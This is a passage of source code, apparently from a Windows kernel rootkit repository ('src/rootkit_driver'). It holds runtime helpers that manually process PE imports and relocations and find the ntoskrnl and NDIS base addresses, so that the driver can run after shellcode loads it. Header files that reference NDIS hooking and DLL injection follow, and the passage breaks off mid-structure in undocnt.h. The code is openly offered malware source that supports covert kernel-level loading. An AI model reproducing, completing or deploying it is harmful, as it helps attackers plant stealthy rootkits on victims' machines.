*/\r\n\r\nsize_t my_strlen(const char *str)\r\n{\r\n    if (str)\r\n    {\r\n        size_t i = 0;\r\n\r\n        for (; str[i] != NULL; i++);\r\n\r\n        return i;        \r\n    }\r\n\r\n    return 0;\r\n}\r\n\r\nint my_strcmp(const char *str_1, const char *str_2)\r\n{\r\n    size_t len_1 = my_strlen(str_1), len_2 = my_strlen(str_2);\r\n\r\n    if (len_1 != len_2)\r\n    {\r\n        return 1;\r\n    }\r\n\r\n    for (size_t i = 0; i < len_1; i++)\r\n    {\r\n        if (str_1[i] != str_2[i])\r\n        {\r\n            return 1;\r\n        }\r\n    }\r\n\r\n    return 0;\r\n}\r\n\r\nchar *my_strcpy(char *str_1, const char *str_2)\r\n{\r\n    size_t len = my_strlen(str_2) + 1;\r\n\r\n    for (size_t i = 0; i < len; i++)\r\n    {\r\n        str_1[i] = str_2[i];\r\n    }\r\n\r\n    return str_1;\r\n}\r\n\r\nchar *my_strlwr(char *str)\r\n{\r\n    char *pos = str;\r\n\r\n    for (; str <= (pos + my_strlen(pos)); str++)\r\n    {\t\t\r\n        if ((*str >= 'A') && (*str <= 'Z')) \r\n        {\r\n            *str = *str + ('a'-'A');\r\n        }\r\n    }\r\n\r\n    return pos;\r\n}\r\n//--------------------------------------------------------------------------------------\r\nwchar_t 
chrlwr_w(wchar_t chr)\r\n{\r\n    if ((chr >= 'A') && (chr <= 'Z')) \r\n    {\r\n        return chr + ('a'-'A');\r\n    }\r\n\r\n    return chr;\r\n}\r\n\r\nBOOLEAN EqualUnicodeString_r(PUNICODE_STRING Str1, PUNICODE_STRING Str2, BOOLEAN CaseInSensitive)\r\n{\r\n    USHORT CmpLen = min(Str1->Length, Str2->Length) / sizeof(WCHAR);\r\n\r\n    // compare unicode strings from the end of the buffers\r\n    for (USHORT i = 1; i < CmpLen; i++)\r\n    {\r\n        WCHAR Chr1 = Str1->Buffer[Str1->Length / sizeof(WCHAR) - i], \r\n              Chr2 = Str2->Buffer[Str2->Length / sizeof(WCHAR) - i];\r\n\r\n        if (CaseInSensitive)\r\n        {\r\n            Chr1 = chrlwr_w(Chr1);\r\n            Chr2 = chrlwr_w(Chr2);\r\n        }\r\n\r\n        if (Chr1 != Chr2)\r\n        {\r\n            return FALSE;\r\n        }\r\n    }\r\n\r\n    return TRUE;\r\n}\r\n//--------------------------------------------------------------------------------------\r\nPVOID RuntimeGetExportAddress(PVOID Image, char *lpszFunctionName)\r\n{\r\n    PIMAGE_EXPORT_DIRECTORY pExport = NULL;\r\n\r\n    PIMAGE_NT_HEADERS32 pHeaders32 = (PIMAGE_NT_HEADERS32)\r\n        ((PUCHAR)Image + ((PIMAGE_DOS_HEADER)Image)->e_lfanew);\r\n\r\n    if (pHeaders32->FileHeader.Machine == IMAGE_FILE_MACHINE_I386)\r\n    {\r\n        // 32-bit image\r\n        if (pHeaders32->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress)\r\n        {\r\n            pExport = (PIMAGE_EXPORT_DIRECTORY)RVATOVA(Image,\r\n                pHeaders32->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress);\r\n        }                        \r\n    }        \r\n    else if (pHeaders32->FileHeader.Machine == IMAGE_FILE_MACHINE_AMD64)\r\n    {\r\n        // 64-bit image\r\n        PIMAGE_NT_HEADERS64 pHeaders64 = (PIMAGE_NT_HEADERS64)\r\n            ((PUCHAR)Image + ((PIMAGE_DOS_HEADER)Image)->e_lfanew);\r\n\r\n        if 
(pHeaders64->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress)\r\n        {\r\n            pExport = (PIMAGE_EXPORT_DIRECTORY)RVATOVA(Image,\r\n                pHeaders64->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress);\r\n        }\r\n    }\r\n    else\r\n    {\r\n        return NULL;\r\n    }\r\n\r\n    if (pExport)\r\n    {\r\n        PULONG AddressOfFunctions = (PULONG)RVATOVA(Image, pExport->AddressOfFunctions);\r\n        PSHORT AddrOfOrdinals = (PSHORT)RVATOVA(Image, pExport->AddressOfNameOrdinals);\r\n        PULONG AddressOfNames = (PULONG)RVATOVA(Image, pExport->AddressOfNames);\r\n\r\n        // enumerate exports\r\n        for (ULONG i = 0; i < pExport->NumberOfFunctions; i++)\r\n        {\r\n            if (!my_strcmp((char *)RVATOVA(Image, AddressOfNames[i]), lpszFunctionName))\r\n            {\r\n                return RVATOVA(Image, AddressOfFunctions[AddrOfOrdinals[i]]);\r\n            }\r\n        }\r\n    }        \r\n\r\n    return NULL;\r\n}\r\n//--------------------------------------------------------------------------------------\r\nBOOLEAN RuntimeProcessImports(PVOID Image, char *ImportedModuleName, PVOID ImportedModuleBase)\r\n{    \r\n    PIMAGE_NT_HEADERS32 pHeaders32 = (PIMAGE_NT_HEADERS32)\r\n        ((PUCHAR)Image + ((PIMAGE_DOS_HEADER)Image)->e_lfanew);\r\n\r\n    PIMAGE_IMPORT_DESCRIPTOR pImport = NULL;\r\n\r\n    if (pHeaders32->FileHeader.Machine == IMAGE_FILE_MACHINE_I386)\r\n    {\r\n        // 32-bit image\r\n        if (pHeaders32->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].VirtualAddress)\r\n        {\r\n            pImport = (PIMAGE_IMPORT_DESCRIPTOR)RVATOVA(Image,\r\n                pHeaders32->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].VirtualAddress);\r\n        }\r\n    }        \r\n    else if (pHeaders32->FileHeader.Machine == IMAGE_FILE_MACHINE_AMD64)\r\n    {\r\n        // 64-bit image\r\n        PIMAGE_NT_HEADERS64 pHeaders64 = 
(PIMAGE_NT_HEADERS64)\r\n            ((PUCHAR)Image + ((PIMAGE_DOS_HEADER)Image)->e_lfanew);\r\n\r\n        if (pHeaders64->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].VirtualAddress)\r\n        {\r\n            pImport = (PIMAGE_IMPORT_DESCRIPTOR)RVATOVA(Image,\r\n                pHeaders64->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].VirtualAddress);\r\n        }\r\n    }\r\n    else\r\n    {\r\n        return FALSE;\r\n    }\r\n\r\n    if (pImport)\r\n    {\r\n        // enumerate import modules\r\n        while (pImport->Name != 0)\r\n        {\r\n            char szName[MAX_IMAGE_NAME_LEN];\r\n            my_strcpy(szName, (char *)RVATOVA(Image, pImport->Name));\r\n            \r\n            if (my_strcmp(my_strlwr(szName), ImportedModuleName))\r\n            {\r\n                // this routine can process only exports from the specified module\r\n                goto skip_module;\r\n            }\r\n\r\n#ifdef _X86_\r\n            \r\n            // process thunk data for 32-bit pointers\r\n            PIMAGE_THUNK_DATA32 pThunk = (PIMAGE_THUNK_DATA32)RVATOVA(Image, pImport->FirstThunk);\r\n\r\n#elif _AMD64_ \r\n\r\n            // process thunk data for 64-bit pointers\r\n            PIMAGE_THUNK_DATA64 pThunk = (PIMAGE_THUNK_DATA64)RVATOVA(Image, pImport->FirstThunk);\r\n#endif\r\n            // enumerate functions of the current module\r\n            while (pThunk->u1.Ordinal != 0)\r\n            {\r\n                PIMAGE_IMPORT_BY_NAME pName = (PIMAGE_IMPORT_BY_NAME)RVATOVA(Image, pThunk->u1.AddressOfData);\r\n                char *lpszFuncName = (char *)&pName->Name;\r\n                \r\n                PVOID FuncAddr = RuntimeGetExportAddress(ImportedModuleBase, lpszFuncName);\r\n                if (FuncAddr == NULL)\r\n                {\r\n                    return FALSE;\r\n                }\r\n\r\n                *(PVOID *)pThunk = FuncAddr;\r\n                pThunk += 1;\r\n            
}\r\n\r\nskip_module:\r\n\r\n            pImport += 1;\r\n        }\r\n    }    \r\n\r\n    return TRUE;\r\n}\r\n//--------------------------------------------------------------------------------------\r\nBOOLEAN RuntimeProcessRelocs(PVOID Image, PVOID NewBase)\r\n{\r\n    PIMAGE_NT_HEADERS32 pHeaders32 = (PIMAGE_NT_HEADERS32)\r\n        ((PUCHAR)Image + ((PIMAGE_DOS_HEADER)Image)->e_lfanew);\r\n\r\n    PIMAGE_BASE_RELOCATION pRelocation = NULL;\r\n    ULONG RelocationSize = 0;        \r\n    ULONGLONG OldBase = 0;\r\n\r\n    if (pHeaders32->FileHeader.Machine == IMAGE_FILE_MACHINE_I386)\r\n    {\r\n        // 32-bit image\r\n        if (pHeaders32->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress)\r\n        {\r\n            pRelocation = (PIMAGE_BASE_RELOCATION)RVATOVA(Image,\r\n                pHeaders32->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress);\r\n            RelocationSize = pHeaders32->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].Size;\r\n        }\r\n\r\n        OldBase = pHeaders32->OptionalHeader.ImageBase;\r\n    }        \r\n    else if (pHeaders32->FileHeader.Machine == IMAGE_FILE_MACHINE_AMD64)\r\n    {\r\n        // 64-bit image\r\n        PIMAGE_NT_HEADERS64 pHeaders64 = (PIMAGE_NT_HEADERS64)\r\n            ((PUCHAR)Image + ((PIMAGE_DOS_HEADER)Image)->e_lfanew);\r\n\r\n        if (pHeaders64->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress)\r\n        {\r\n            pRelocation = (PIMAGE_BASE_RELOCATION)RVATOVA(Image,\r\n                pHeaders64->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress);\r\n            RelocationSize = pHeaders64->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].Size;\r\n        }\r\n\r\n        OldBase = pHeaders64->OptionalHeader.ImageBase;\r\n    }\r\n    else\r\n    {\r\n        return FALSE;\r\n    }\r\n\r\n    if (pRelocation)\r\n    {\r\n        ULONG Size = 
0;\r\n\r\n        // enumerate relocation pages\r\n        while (RelocationSize > Size && pRelocation->SizeOfBlock)\r\n        {            \r\n            ULONG Number = (pRelocation->SizeOfBlock - 8) / 2;\r\n            PUSHORT Rel = (PUSHORT)((PUCHAR)pRelocation + 8);            \r\n\r\n            // enumerate relocation offsets for the current page\r\n            for (ULONG i = 0; i < Number; i++)\r\n            {\r\n                if (Rel[i] > 0)\r\n                {\r\n                    USHORT Type = (Rel[i] & 0xF000) >> 12;\r\n\r\n                    // check for supporting type\r\n                    if (Type != IMAGE_REL_BASED_HIGHLOW &&\r\n                        Type != IMAGE_REL_BASED_DIR64)\r\n                    {\r\n                        return FALSE;\r\n                    }\r\n#ifdef _X86_\r\n                    *(PULONG)(RVATOVA(Image, pRelocation->VirtualAddress + \r\n                        (Rel[i] & 0x0FFF))) += (ULONG)((ULONGLONG)NewBase - OldBase);\r\n#elif _AMD64_\r\n                    *(PULONGLONG)(RVATOVA(Image, pRelocation->VirtualAddress + \r\n                        (Rel[i] & 0x0FFF))) += (ULONGLONG)NewBase - OldBase;\r\n#endif\r\n                }\r\n            }\r\n\r\n            pRelocation = (PIMAGE_BASE_RELOCATION)((PUCHAR)pRelocation + pRelocation->SizeOfBlock);\r\n            Size += pRelocation->SizeOfBlock;            \r\n        }\r\n    }\r\n\r\n    return TRUE;\r\n}\r\n//--------------------------------------------------------------------------------------\r\nPVOID RuntimeGetSystemInformation(SYSTEM_INFORMATION_CLASS InfoClass)\r\n{\r\n    NTSTATUS ns = STATUS_SUCCESS;\r\n    ULONG Size = 0x100;\r\n    PVOID Info = NULL;\r\n\r\n    while (true) \r\n    {    \r\n        // allocate memory for the system information\r\n        if ((Info = ExAllocatePool(NonPagedPool, Size)) == NULL) \r\n        {\r\n            DbgMsg(\"ExAllocatePool() fails\\n\");\r\n            return NULL;\r\n        }\r\n\r\n        ULONG 
RetSize = 0;\r\n        ns = ZwQuerySystemInformation(InfoClass, Info, Size, &RetSize);\r\n        if (ns == STATUS_INFO_LENGTH_MISMATCH)\r\n        {       \r\n            ExFreePool(Info);\r\n            Info = NULL;\r\n\r\n            if (RetSize > 0)\r\n            {\r\n                // need more memory\r\n                Size = RetSize + 0x100;\r\n            }            \r\n            else\r\n            {\r\n                break;\r\n            }\r\n        }\r\n        else\r\n        {\r\n            break;    \r\n        }\r\n    }\r\n\r\n    if (!NT_SUCCESS(ns))\r\n    {\r\n        DbgMsg(\"ZwQuerySystemInformation() fails; status: 0x%.8x\\n\", ns);\r\n\r\n        if (Info)\r\n        {\r\n            // cleanup on error\r\n            ExFreePool(Info);\r\n        }\r\n\r\n        return NULL;\r\n    }\r\n\r\n    return Info;\r\n}\r\n//--------------------------------------------------------------------------------------\r\nPVOID RuntimeGetKernelModuleBase(char *ModuleName)\r\n{\r\n    PVOID pModuleBase = NULL;\r\n    UNICODE_STRING usCommonHalName, usCommonNtName;\r\n\r\n    RtlInitUnicodeString(&usCommonHalName, L\"hal.dll\");\r\n    RtlInitUnicodeString(&usCommonNtName, L\"ntoskrnl.exe\");\r\n\r\n    #define HAL_NAMES_NUM 6\r\n    wchar_t *wcHalNames[] = \r\n    {\r\n        L\"hal.dll\",      // Non-ACPI PIC HAL \r\n        L\"halacpi.dll\",  // ACPI PIC HAL\r\n        L\"halapic.dll\",  // Non-ACPI APIC UP HAL\r\n        L\"halmps.dll\",   // Non-ACPI APIC MP HAL\r\n        L\"halaacpi.dll\", // ACPI APIC UP HAL\r\n        L\"halmacpi.dll\"  // ACPI APIC MP HAL\r\n    };\r\n\r\n    #define NT_NAMES_NUM 4\r\n    wchar_t *wcNtNames[] = \r\n    {\r\n        L\"ntoskrnl.exe\", // UP\r\n        L\"ntkrnlpa.exe\", // UP PAE\r\n        L\"ntkrnlmp.exe\", // MP\r\n        L\"ntkrpamp.exe\"  // MP PAE\r\n    };\r\n\r\n    PRTL_PROCESS_MODULES Info = (PRTL_PROCESS_MODULES)RuntimeGetSystemInformation(SystemModuleInformation);\r\n    if (Info)\r\n    {\r\n 
       ANSI_STRING asModuleName;\r\n        UNICODE_STRING usModuleName;\r\n\r\n        RtlInitAnsiString(&asModuleName, ModuleName);\r\n\r\n        NTSTATUS ns = RtlAnsiStringToUnicodeString(&usModuleName, &asModuleName, TRUE);\r\n        if (NT_SUCCESS(ns))\r\n        {\r\n            for (ULONG i = 0; i < Info->NumberOfModules; i++)\r\n            {\r\n                ANSI_STRING asEnumModuleName;\r\n                UNICODE_STRING usEnumModuleName;\r\n\r\n                RtlInitAnsiString(\r\n                    &asEnumModuleName, \r\n                    (char *)Info->Modules[i].FullPathName + Info->Modules[i].OffsetToFileName\r\n                );\r\n\r\n                NTSTATUS ns = RtlAnsiStringToUnicodeString(&usEnumModuleName, &asEnumModuleName, TRUE);\r\n                if (NT_SUCCESS(ns))\r\n                {                    \r\n                    if (RtlEqualUnicodeString(&usModuleName, &usCommonHalName, TRUE))\r\n                    {\r\n                        // hal.dll passed as module name\r\n                        for (int i_m = 0; i_m < HAL_NAMES_NUM; i_m++)\r\n                        {\r\n                            UNICODE_STRING usHalName;\r\n                            RtlInitUnicodeString(&usHalName, wcHalNames[i_m]);\r\n\r\n                            // compare module name from list with known HAL module name\r\n                            if (RtlEqualUnicodeString(&usEnumModuleName, &usHalName, TRUE))\r\n                            {\r\n                                pModuleBase = (PVOID)Info->Modules[i].ImageBase;\r\n                                break;\r\n                            }\r\n                        }\r\n                    }\r\n                    else if (RtlEqualUnicodeString(&usModuleName, &usCommonNtName, TRUE))\r\n                    {\r\n                        // ntoskrnl.exe passed as module name\r\n                        for (int i_m = 0; i_m < NT_NAMES_NUM; i_m++)\r\n                        {\r\n           
                 UNICODE_STRING usNtName;\r\n                            RtlInitUnicodeString(&usNtName, wcNtNames[i_m]);\r\n\r\n                            // compare module name from list with known kernel module name\r\n                            if (RtlEqualUnicodeString(&usEnumModuleName, &usNtName, TRUE))\r\n                            {\r\n                                pModuleBase = (PVOID)Info->Modules[i].ImageBase;\r\n                                break;\r\n                            }\r\n                        }\r\n                    }\r\n                    else if (RtlEqualUnicodeString(&usModuleName, &usEnumModuleName, TRUE))\r\n                    {\r\n                        pModuleBase = (PVOID)Info->Modules[i].ImageBase;\r\n                    }\r\n\r\n                    RtlFreeUnicodeString(&usEnumModuleName);\r\n\r\n                    if (pModuleBase)\r\n                    {\r\n                        // module is found\r\n                        break;\r\n                    }\r\n                }                    \r\n            }                     \r\n\r\n            RtlFreeUnicodeString(&usModuleName);\r\n        }        \r\n\r\n        ExFreePool(Info);\r\n    }\r\n\r\n    return pModuleBase;\r\n}\r\n//--------------------------------------------------------------------------------------\r\nBOOLEAN RuntimeInitialize(\r\n    PDRIVER_OBJECT DriverObject,\r\n    PUNICODE_STRING RegistryPath)\r\n{\r\n    if (DriverObject == NULL)\r\n    {\r\n        /**\r\n         * Driver has been loaded by shellcode.\r\n         * RegistryPath - pointer to the SC_PARAMS\r\n         */\r\n\r\n        PSC_PARAMS ShellcodeParams = (PSC_PARAMS)RegistryPath;        \r\n\r\n        // parse image relocations\r\n        if (!RuntimeProcessRelocs(\r\n            ShellcodeParams->rootkit_base, \r\n            ShellcodeParams->rootkit_base))\r\n        {\r\n            return FALSE;\r\n        }\r\n\r\n        /*\r\n            Safe to use global 
variables here.\r\n        */\r\n\r\n        m_KernelBase = ShellcodeParams->kernel_base;\r\n        m_DriverBase = ShellcodeParams->rootkit_base;        \r\n\r\n        // parse image imports (kernel)            \r\n        if (!RuntimeProcessImports(\r\n            ShellcodeParams->rootkit_base,\r\n            \"ntoskrnl.exe\", ShellcodeParams->kernel_base))\r\n        {\r\n            return FALSE;\r\n        }\r\n\r\n        /*\r\n            Safe to use kernel imports here.\r\n        */\r\n\r\n        DbgMsg(__FUNCTION__\"(): Kernel base is \"IFMT\"\\n\", m_KernelBase);\r\n\r\n        PVOID NdisBase = RuntimeGetKernelModuleBase(\"ndis.sys\");\r\n        if (NdisBase)\r\n        {\r\n            DbgMsg(__FUNCTION__\"(): NDIS base is \"IFMT\"\\n\", NdisBase);\r\n\r\n            // parse image imports (NDIS)\r\n            if (!RuntimeProcessImports(\r\n                ShellcodeParams->rootkit_base,\r\n                \"ndis.sys\", NdisBase))\r\n            {\r\n                return FALSE;\r\n            }\r\n        }        \r\n        else\r\n        {\r\n            DbgMsg(__FUNCTION__\"() ERROR: Unable to locate NDIS\\n\");\r\n            return FALSE;\r\n        }\r\n\r\n        /*\r\n            Safe to use all others imports here.\r\n        */\r\n    }\r\n\r\n    // driver has been loaded as usual\r\n    return TRUE;\r\n}\r\n//--------------------------------------------------------------------------------------\r\n// EoF\r\n\r\n"
  },
  {
    "path": "src/rootkit_driver/runtime.h",
    "content": "\r\nextern \"C\"\r\n{\r\n    size_t my_strlen(const char *str);\r\n    int my_strcmp(const char *str_1, const char *str_2);\r\n    char *my_strcpy(char *str_1, const char *str_2);\r\n    char *my_strlwr(char *str);\r\n\r\n    wchar_t chrlwr_w(wchar_t chr);\r\n    BOOLEAN EqualUnicodeString_r(PUNICODE_STRING Str1, PUNICODE_STRING Str2, BOOLEAN CaseInSensitive);\r\n\r\n    PVOID RuntimeGetSystemInformation(SYSTEM_INFORMATION_CLASS InfoClass);\r\n    PVOID RuntimeGetKernelModuleBase(char *ModuleName);\r\n    PVOID RuntimeGetExportAddress(PVOID Image, char *lpszFunctionName);\r\n    BOOLEAN RuntimeProcessImports(PVOID Image, PVOID KernelAddress);\r\n    BOOLEAN RuntimeProcessRelocs(PVOID Image, PVOID NewBase);\r\n\r\n    BOOLEAN RuntimeInitialize(\r\n        PDRIVER_OBJECT DriverObject,\r\n        PUNICODE_STRING RegistryPath\r\n    );\r\n}\r\n"
  },
  {
    "path": "src/rootkit_driver/stdafx.h",
    "content": "#pragma warning(disable: 4200)\r\n\r\nextern \"C\"\r\n{\r\n#include <stdio.h>\r\n#include <stdarg.h>\r\n#include <ntddk.h>\r\n#include <ntimage.h>\r\n\r\n#include \"undocnt.h\"\r\n}\r\n\r\n#include \"debug.h\"\r\n#include \"runtime.h\"\r\n#include \"ndis_hook.h\"\r\n#include \"network.h\"\r\n#include \"rootkit_driver.h\"\r\n#include \"dll_inject.h\"\r\n\r\n#include \"../common/common.h\"\r\n#include \"../rootkit_driver_config.h\"\r\n"
  },
  {
    "path": "src/rootkit_driver/undocnt.h",
    "content": "\r\n// ********************************************************\r\n// some user-mode structures\r\n\r\ntypedef struct _LDR_DATA_TABLE_ENTRY\r\n{\r\n    LIST_ENTRY InLoadOrderModuleList;\r\n    LIST_ENTRY InMemoryOrderModuleList;\r\n    LIST_ENTRY InInitializationOrderModuleList;\r\n    PVOID DllBase;\r\n    PVOID EntryPoint;\r\n    ULONG SizeOfImage;\r\n    UNICODE_STRING FullDllName;\r\n    UNICODE_STRING BaseDllName;\r\n    ULONG Flags;\r\n    USHORT LoadCount;\r\n    USHORT TlsIndex;\r\n    LIST_ENTRY HashLinks;\r\n    PVOID SectionPointer;\r\n    ULONG CheckSum;\r\n    ULONG TimeDateStamp;\r\n\r\n} LDR_DATA_TABLE_ENTRY, \r\n*PLDR_DATA_TABLE_ENTRY;\r\n\r\ntypedef struct _PEB_LDR_DATA \r\n{\r\n    ULONG Length;\r\n    BOOLEAN Initialized;\r\n    PVOID SsHandle;\r\n    LIST_ENTRY ModuleListLoadOrder;\r\n    LIST_ENTRY ModuleListMemoryOrder;\r\n    LIST_ENTRY ModuleListInitOrder;\r\n\r\n} PEB_LDR_DATA, \r\n*PPEB_LDR_DATA;\r\n\r\n// ********************************************************\r\n\r\ntypedef struct SERVICE_DESCRIPTOR_ENTRY\r\n{\r\n    PVOID\t*ServiceTableBase;\r\n    PULONG\tServiceCounterTableBase;\r\n    ULONG\tNumberOfServices;\r\n    PUCHAR\tParamTableBase;\r\n\r\n} SERVICE_DESCRIPTOR_ENTRY,\r\n*PSERVICE_DESCRIPTOR_ENTRY;\r\n\r\ntypedef struct _SERVICE_DESCRIPTOR_TABLE \r\n{\r\n    SERVICE_DESCRIPTOR_ENTRY Entry[2];\r\n\r\n} SERVICE_DESCRIPTOR_TABLE,\r\n*PSERVICE_DESCRIPTOR_TABLE; \r\n\r\ntypedef enum _SYSTEM_INFORMATION_CLASS \r\n{\r\n    SystemBasicInformation,\r\n    SystemProcessorInformation,             // obsolete...delete\r\n    SystemPerformanceInformation,\r\n    SystemTimeOfDayInformation,\r\n    SystemPathInformation,\r\n    SystemProcessInformation,\r\n    SystemCallCountInformation,\r\n    SystemDeviceInformation,\r\n    SystemProcessorPerformanceInformation,\r\n    SystemFlagsInformation,\r\n    SystemCallTimeInformation,\r\n    SystemModuleInformation,\r\n    SystemLocksInformation,\r\n    
SystemStackTraceInformation,\r\n    SystemPagedPoolInformation,\r\n    SystemNonPagedPoolInformation,\r\n    SystemHandleInformation,\r\n    SystemObjectInformation,\r\n    SystemPageFileInformation,\r\n    SystemVdmInstemulInformation,\r\n    SystemVdmBopInformation,\r\n    SystemFileCacheInformation,\r\n    SystemPoolTagInformation,\r\n    SystemInterruptInformation,\r\n    SystemDpcBehaviorInformation,\r\n    SystemFullMemoryInformation,\r\n    SystemLoadGdiDriverInformation,\r\n    SystemUnloadGdiDriverInformation,\r\n    SystemTimeAdjustmentInformation,\r\n    SystemSummaryMemoryInformation,\r\n    SystemMirrorMemoryInformation,\r\n    SystemPerformanceTraceInformation,\r\n    SystemObsolete0,\r\n    SystemExceptionInformation,\r\n    SystemCrashDumpStateInformation,\r\n    SystemKernelDebuggerInformation,\r\n    SystemContextSwitchInformation,\r\n    SystemRegistryQuotaInformation,\r\n    SystemExtendServiceTableInformation,\r\n    SystemPrioritySeperation,\r\n    SystemVerifierAddDriverInformation,\r\n    SystemVerifierRemoveDriverInformation,\r\n    SystemProcessorIdleInformation,\r\n    SystemLegacyDriverInformation,\r\n    SystemCurrentTimeZoneInformation,\r\n    SystemLookasideInformation,\r\n    SystemTimeSlipNotification,\r\n    SystemSessionCreate,\r\n    SystemSessionDetach,\r\n    SystemSessionInformation,\r\n    SystemRangeStartInformation,\r\n    SystemVerifierInformation,\r\n    SystemVerifierThunkExtend,\r\n    SystemSessionProcessInformation,\r\n    SystemLoadGdiDriverInSystemSpace,\r\n    SystemNumaProcessorMap,\r\n    SystemPrefetcherInformation,\r\n    SystemExtendedProcessInformation,\r\n    SystemRecommendedSharedDataAlignment,\r\n    SystemComPlusPackage,\r\n    SystemNumaAvailableMemory,\r\n    SystemProcessorPowerInformation,\r\n    SystemEmulationBasicInformation,\r\n    SystemEmulationProcessorInformation,\r\n    SystemExtendedHandleInformation,\r\n    SystemLostDelayedWriteInformation,\r\n    SystemBigPoolInformation,\r\n    
SystemSessionPoolTagInformation,\r\n    SystemSessionMappedViewInformation,\r\n    SystemHotpatchInformation,\r\n    SystemObjectSecurityMode,\r\n    SystemWatchdogTimerHandler,\r\n    SystemWatchdogTimerInformation,\r\n    SystemLogicalProcessorInformation,\r\n    SystemWow64SharedInformation,\r\n    SystemRegisterFirmwareTableInformationHandler,\r\n    SystemFirmwareTableInformation,\r\n    SystemModuleInformationEx,\r\n    SystemVerifierTriageInformation,\r\n    SystemSuperfetchInformation,\r\n    SystemMemoryListInformation,\r\n    SystemFileCacheInformationEx,\r\n    MaxSystemInfoClass  // MaxSystemInfoClass should always be the last enum\r\n    \r\n} SYSTEM_INFORMATION_CLASS;\r\n\r\ntypedef struct _RTL_PROCESS_MODULE_INFORMATION \r\n{\r\n    HANDLE Section;                 // Not filled in\r\n    PVOID MappedBase;\r\n    PVOID ImageBase;\r\n    ULONG ImageSize;\r\n    ULONG Flags;\r\n    USHORT LoadOrderIndex;\r\n    USHORT InitOrderIndex;\r\n    USHORT LoadCount;\r\n    USHORT OffsetToFileName;\r\n    UCHAR  FullPathName[ 256 ];\r\n    \r\n} RTL_PROCESS_MODULE_INFORMATION, \r\n*PRTL_PROCESS_MODULE_INFORMATION;\r\n\r\ntypedef struct _RTL_PROCESS_MODULES \r\n{\r\n    ULONG NumberOfModules;\r\n    RTL_PROCESS_MODULE_INFORMATION Modules[ 1 ];\r\n    \r\n} RTL_PROCESS_MODULES, \r\n*PRTL_PROCESS_MODULES;\r\n\r\ntypedef struct _SYSTEM_HANDLE_TABLE_ENTRY_INFO \r\n{\r\n    USHORT UniqueProcessId;\r\n    USHORT CreatorBackTraceIndex;\r\n    UCHAR ObjectTypeIndex;\r\n    UCHAR HandleAttributes;\r\n    USHORT HandleValue;\r\n    PVOID Object;\r\n    ULONG GrantedAccess;\r\n\r\n} SYSTEM_HANDLE_TABLE_ENTRY_INFO, \r\n*PSYSTEM_HANDLE_TABLE_ENTRY_INFO;\r\n\r\ntypedef struct _SYSTEM_HANDLE_INFORMATION \r\n{\r\n    ULONG NumberOfHandles;\r\n    SYSTEM_HANDLE_TABLE_ENTRY_INFO Handles[ 1 ];\r\n\r\n} SYSTEM_HANDLE_INFORMATION, \r\n*PSYSTEM_HANDLE_INFORMATION;\r\n\r\ntypedef struct _FILE_DIRECTORY_INFORMATION\r\n{\r\n    ULONG NextEntryOffset;\r\n    ULONG FileIndex;\r\n    
LARGE_INTEGER CreationTime;\r\n    LARGE_INTEGER LastAccessTime;\r\n    LARGE_INTEGER LastWriteTime;\r\n    LARGE_INTEGER ChangeTime;\r\n    LARGE_INTEGER EndOfFile;\r\n    LARGE_INTEGER AllocationSize;\r\n    ULONG FileAttributes;\r\n    ULONG FileNameLength;\r\n    WCHAR FileName[1];\r\n\r\n} FILE_DIRECTORY_INFORMATION, \r\n*PFILE_DIRECTORY_INFORMATION;\r\n\r\ntypedef struct _FILE_FULL_DIRECTORY_INFORMATION\r\n{\r\n    ULONG NextEntryOffset;\r\n    ULONG FileIndex;\r\n    LARGE_INTEGER CreationTime;\r\n    LARGE_INTEGER LastAccessTime;\r\n    LARGE_INTEGER LastWriteTime;\r\n    LARGE_INTEGER ChangeTime;\r\n    LARGE_INTEGER EndOfFile;\r\n    LARGE_INTEGER AllocationSize;\r\n    ULONG FileAttributes;\r\n    ULONG FileNameLength;\r\n    ULONG EaSize;\r\n    WCHAR FileName[1];\r\n\r\n} FILE_FULL_DIRECTORY_INFORMATION, \r\n*PFILE_FULL_DIRECTORY_INFORMATION;\r\n\r\ntypedef struct _FILE_BOTH_DIRECTORY_INFORMATION \r\n{\r\n    ULONG NextEntryOffset;\r\n    ULONG Unknown;\r\n    LARGE_INTEGER CreationTime;\r\n    LARGE_INTEGER LastAccessTime;\r\n    LARGE_INTEGER LastWriteTime;\r\n    LARGE_INTEGER ChangeTime;\r\n    LARGE_INTEGER EndOfFile;\r\n    LARGE_INTEGER AllocationSize;\r\n    ULONG FileAttributes;\r\n    ULONG FileNameLength;\r\n    ULONG EaInformationLength;\r\n    UCHAR AlternateNameLength;\r\n    WCHAR AlternateName[12];\r\n    WCHAR FileName[1];\r\n\r\n} FILE_BOTH_DIRECTORY_INFORMATION, \r\n*PFILE_BOTH_DIRECTORY_INFORMATION; \r\n\r\ntypedef struct _FILE_NAMES_INFORMATION\r\n{\r\n    ULONG NextEntryOffset;\r\n    ULONG FileIndex;\r\n    ULONG FileNameLength;\r\n    WCHAR FileName[1];\r\n\r\n} FILE_NAMES_INFORMATION, \r\n*PFILE_NAMES_INFORMATION;\r\n\r\ntypedef struct _FILE_ID_BOTH_DIRECTORY_INFORMATION \r\n{\r\n    ULONG NextEntryOffset;\r\n    ULONG FileIndex;\r\n    LARGE_INTEGER CreationTime;\r\n    LARGE_INTEGER LastAccessTime;\r\n    LARGE_INTEGER LastWriteTime;\r\n    LARGE_INTEGER ChangeTime;\r\n    LARGE_INTEGER EndOfFile;\r\n    LARGE_INTEGER 
